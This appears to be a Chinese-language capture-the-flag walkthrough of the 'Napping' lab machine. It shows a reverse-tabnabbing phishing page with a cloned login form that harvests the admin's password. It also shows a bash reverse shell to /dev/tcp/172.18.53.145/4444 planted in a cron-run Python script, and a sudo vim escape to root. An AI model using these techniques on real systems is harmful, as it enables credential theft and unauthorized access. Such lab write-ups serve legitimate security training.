环境配置
靶机连接
攻击者主机IP:192.168.47.145
目标主机IP:192.168.47.13
信息搜集
扫描目标主机,发现目标主机开放了22和80端口
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 172.18.53.13
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-09 08:48 EST
Nmap scan report for 172.18.53.1
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
| 256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_ 256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 172.18.53.1
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 seconds
Web漏洞挖掘
访问目标主机的80端口,发现是一个登录注册页面
此处考虑sql注入,万能密码,弱口令,未成功
接着考虑爆破目录,看看是否存在其他的路径
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://172.18.53.13/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.18.53.1/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,php,html,js,txt.bak,git,git.bak,txt,php.bak,html.bak,json,zip.bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 276]
/.html.bak (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/register.php (Status: 200) [Size: 1566]
/index.php (Status: 200) [Size: 1219]
/welcome.php (Status: 302) [Size: 0] [--> index.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/config.php (Status: 200) [Size: 0]
/.html.bak (Status: 403) [Size: 276]
/.php (Status: 403) [Size: 276]
/.html (Status: 403) [Size: 276]
/server-status (Status: 403) [Size: 276]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
访问config.php,发现是空白页,猜测可能需要传参,ffuf之后没有成功
那么回到前面的页面,先注册一个账号再登录
登录之后,是一个博客推广网站,可以免费提交博客链接用于推广,所有链接都会被管理员用户审查。
在我们提交链接之后,可以通过点击Here查看我们提交的链接。
搜索查看wp之后,发现这里存在Tabnabbing漏洞。
通过F12修改Here对应的链接,看看是否可以i跳转。如果输入什么网站,就跳转到什么网站,那么会存在Tabnabbing漏洞。
Tabnabbing攻击:
使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点:
1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open
点击之后,确实发生了跳转
接着,我们创建两个页面,一个是恶意的页面B,另一个是伪造的登录页面C
恶意页面B.html:
<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) mainframe.location.replace=('http://172.18.53.145:8888/C.html');
if(window.opener != window) mainframe.location.replace=('http://172.18.53.145:8888/C.html');
</script>
</body>
</html>
代码解释:
代码解释:
1. window.opener 属性表示打开当前窗口的窗口对象,如果当前窗口不是由另一个窗口打开的,则它的值为null。
2. if(window.opener) 这行代码检查window.opener是否存在,如果存在,表示当前窗口是被另一个窗口打开的,即在iframe中。
3. mainframe 表示主窗口,也就是打开当前窗口的窗口。
4. location.replace 能将主窗口的地址栏改变到一个新的地址,相当于重定向主窗口。
5. 将主窗口的location改成'http://172.18.53.145:8888/login.html',意味着重定向主窗口到这个新的登录页面。
伪造的登陆页面C.html,这里直接拷贝了正常登录页面的源码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<style>
body{ font: 14px sans-serif; }
.wrapper{ width: 360px; padding: 20px; }
</style>
</head>
<body>
<div class="wrapper">
<h2>Login</h2>
<p>Please fill in your credentials to login.</p>
<form action="/index.php" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
</form>
</div>
</body>
</html>
在攻击者机器上使用python起一个http服务,并监听本地8888端口
┌──(kali㉿kali)-[~/tools/download]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888
listening on [any] 8888 ...
然后将B页面当作需要推广的博客链接提交,这样就相当于将恶意链接嵌入了正常的页面,当管理员用户点击该链接进行审查时,原页面就会跳转到我们伪造的登录页面,当管理员用户登录时,攻击者就可以拿到管理员用户的账号密码。
┌──(kali㉿kali)-[~]
└─$ nc -lvp 8888
listening on [any] 8888 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 49584
POST /login.html HTTP/1.1
Host: 172.18.53.145:8888
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
username=daniel&password=C%40ughtm3napping123
这样我们就拿到了账号:daniel,密码:C@ughtm3napping123,想到端口扫描时,目标主机还开放了22端口,那么就使用这个账号密码进行SSH登录。
┌──(kali㉿kali)-[~]
└─$ ssh daniel@172.18.53.13
The authenticity of host '172.18.53.13 (172.18.53.13)' can't be established.
ED25519 key fingerprint is SHA256:81h22zyEZ6ztpKfLu65kzPnsnUUotkuioRYPno8fpN8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.53.13' (ED25519) to the list of known hosts.
daniel@172.18.53.13's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Nov 10 06:49:58 UTC 2023
System load: 0.02
Usage of /: 44.0% of 18.57GB
Memory usage: 10%
Swap usage: 0%
Processes: 149
Users logged in: 0
IPv4 address for enp0s3: 172.18.53.13
IPv6 address for enp0s3: 2001:250:6406:2053:a00:27ff:fe49:ee4d
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
33 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15
daniel@napping:~$
提权
登录之后收集目标主机的基本信息
(1)有当前用户的密码,可以先查看一下当前用户的权限,发现当前用户没有权限
daniel@napping:~$ sudo -l
[sudo] password for daniel:
Sorry, user daniel may not run sudo on napping.
2)看看有没有可疑的用户或者用户组
查看当前用户及其所属组,发现当前用户有一个所在组administrators
daniel@napping:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
查看/etc/passwd文件,看看有没有特殊的用户,发现adrian用户和daniel用户,通过ls /home也可以查看
daniel@napping:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
adrian:x:1000:1000:adrian:/home/adrian:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
daniel:x:1001:1001::/home/daniel:/bin/bash
(3)查看内核版本以及网络情况
daniel@napping:~$ uname -a
Linux napping 5.4.0-89-generic #100-Ubuntu SMP Fri Sep 24 14:50:10 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
daniel@napping:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:49:ee:4d brd ff:ff:ff:ff:ff:ff
inet 172.18.53.13/24 brd 172.18.53.255 scope global dynamic enp0s3
valid_lft 4184sec preferred_lft 4184sec
inet6 2001:250:6406:2053:a00:27ff:fe49:ee4d/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 2591998sec preferred_lft 604798sec
inet6 fe80::a00:27ff:fe49:ee4d/64 scope link
valid_lft forever preferred_lft forever
(4)查看看网站根目录是否存在数据库账号密码等敏感信息
在config.php页面中发现一个数据库的账号密码
daniel@napping:~$ cd /var/www/html/
daniel@napping:/var/www/html$ ls -liah
total 44K
792043 drwxr-xr-x 2 root root 4.0K Oct 12 2021 .
792042 drwxr-xr-x 3 root root 4.0K Oct 11 2021 ..
792826 -rw-r--r-- 1 root root 486 Oct 11 2021 config.php
792827 -rw-r--r-- 1 root root 4.7K Oct 11 2021 index.php
792828 -rw-r--r-- 1 root root 223 Oct 11 2021 logout.php
792830 -rw-r--r-- 1 root root 5.2K Oct 11 2021 register.php
792829 -rw-r--r-- 1 root root 3.9K Oct 11 2021 reset-password.php
794398 -rw-r--r-- 1 root root 6.8K Oct 12 2021 welcome.php
daniel@napping:/var/www/html$ cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($mysqli === false){
die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>
(5)查看用户家目录下有没有可疑的文件
daniel@napping:~$ ls /home/
adrian daniel
daniel@napping:~$ ls -liah /home/adrian/
total 32K
791504 drwxr-xr-x 3 adrian adrian 4.0K Nov 9 13:48 .
262145 drwxr-xr-x 4 root root 4.0K Oct 12 2021 ..
794373 lrwxrwxrwx 1 adrian adrian 9 Oct 12 2021 .bash_history -> /dev/null
791506 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .bash_logout
791507 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .bashrc
791524 drwx------ 2 adrian adrian 4.0K Oct 11 2021 .cache
794363 lrwxrwxrwx 1 adrian adrian 9 Oct 12 2021 .mysql_history -> /dev/null
791505 -rw-r--r-- 1 adrian adrian 0 Feb 25 2020 .profile
794359 -rw-rw-r-- 1 adrian adrian 75 Oct 11 2021 .selected_editor
791526 -rw-r--r-- 1 adrian adrian 0 Oct 11 2021 .sudo_as_admin_successful
792736 -rw------- 1 adrian adrian 0 Oct 30 2021 .viminfo
792740 -rw-rw-r-- 1 adrian administrators 481 Oct 30 2021 query.py
792383 -rw-rw-r-- 1 adrian adrian 5.9K Nov 10 07:08 site_status.txt
794392 -rw------- 1 adrian adrian 22 Oct 12 2021 user.txt
daniel@napping:~$ ls -liah /home/daniel/
total 24K
792831 drwxr-xr-x 3 daniel daniel 4.0K Oct 12 2021 .
262145 drwxr-xr-x 4 root root 4.0K Oct 12 2021 ..
794391 lrwxrwxrwx 1 daniel daniel 9 Oct 12 2021 .bash_history -> /dev/null
794358 -rw-r--r-- 1 daniel daniel 220 Feb 25 2020 .bash_logout
794360 -rw-r--r-- 1 daniel daniel 3.7K Feb 25 2020 .bashrc
794361 drwx------ 2 daniel daniel 4.0K Oct 12 2021 .cache
794351 -rw-r--r-- 1 daniel daniel 807 Feb 25 2020 .profile
792825 -rw------- 1 daniel daniel 0 Oct 12 2021 .viminfo
daniel用户的家目录下,没有什么可疑文件,
adrian用户家目录下的query.py文件,对于用户组administrators有读写权限,当前登录的用户也在这个用户组,那么这个文件可以考虑利用。先查看这个文件的内容
daniel@napping:~$ cat /home/adrian/query.py
from datetime import datetime
import requests
now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Site is Up: ")
f.write(dt_string)
f.write("\n")
f.close()
else:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Check Out Site: ")
f.write(dt_string)
f.write("\n")
f.close()
该文件首先访问本机的网站,如果访问成功则向site_status.txt文件写入Site is Up和检查时间,如果访问失败,写入CHeck Out Site和检查时间
查看site_status.txt文件,发现该文件从网站运行开始,每两分钟记录一次网站的运行状态
daniel@napping:/home/adrian$ cat site_status.txt
Site is Up: 09/11/2023 13:48:03
Site is Up: 09/11/2023 13:50:01
Site is Up: 09/11/2023 13:52:02
Site is Up: 09/11/2023 13:54:01
Site is Up: 09/11/2023 13:56:01
Site is Up: 09/11/2023 13:58:01
Site is Up: 09/11/2023 14:00:02
Site is Up: 09/11/2023 14:02:01
Site is Up: 09/11/2023 14:04:02
Site is Up: 09/11/2023 14:06:02
Site is Up: 09/11/2023 14:08:02
Site is Up: 09/11/2023 14:10:01
Site is Up: 09/11/2023 14:12:01
Site is Up: 09/11/2023 14:14:01
Site is Up: 09/11/2023 14:16:02
猜测有定时任务,每两分钟运行一次该脚本。
因为当前用户所在所在用户组有权限修改该脚本,所以考虑直接修改该脚本反弹shell,拿到adrian用户权限。
在/tmp目录下创建shell.sh
daniel@napping:/tmp$ cat shell.sh
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/172.18.53.145/4444 0>&1'
修改query.py文件
daniel@napping:/home/adrian$ cat query.py
from datetime import datetime
import requests
import os
os.system('/usr/bin/bash /tmp/shell.sh')
now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Site is Up: ")
f.write(dt_string)
f.write("\n")
f.close()
else:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Check Out Site: ")
f.write(dt_string)
f.write("\n")
f.close()
等待两分钟,shell反弹成功
┌──(kali㉿kali)-[~/tools/download]
└─$ nc -lvp 4444
listening on [any] 4444 ...
172.18.53.13: inverse host lookup failed: Unknown host
connect to [172.18.53.145] from (UNKNOWN) [172.18.53.13] 35184
bash: cannot set terminal process group (3941): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$
查看当前用户的权限,发现当前用户可以在不需要密码的情况下使用vim
adrian@napping:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim
于是,利用vim提权
sudo vim -c ':!/bin/sh'
提权成功
:!/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)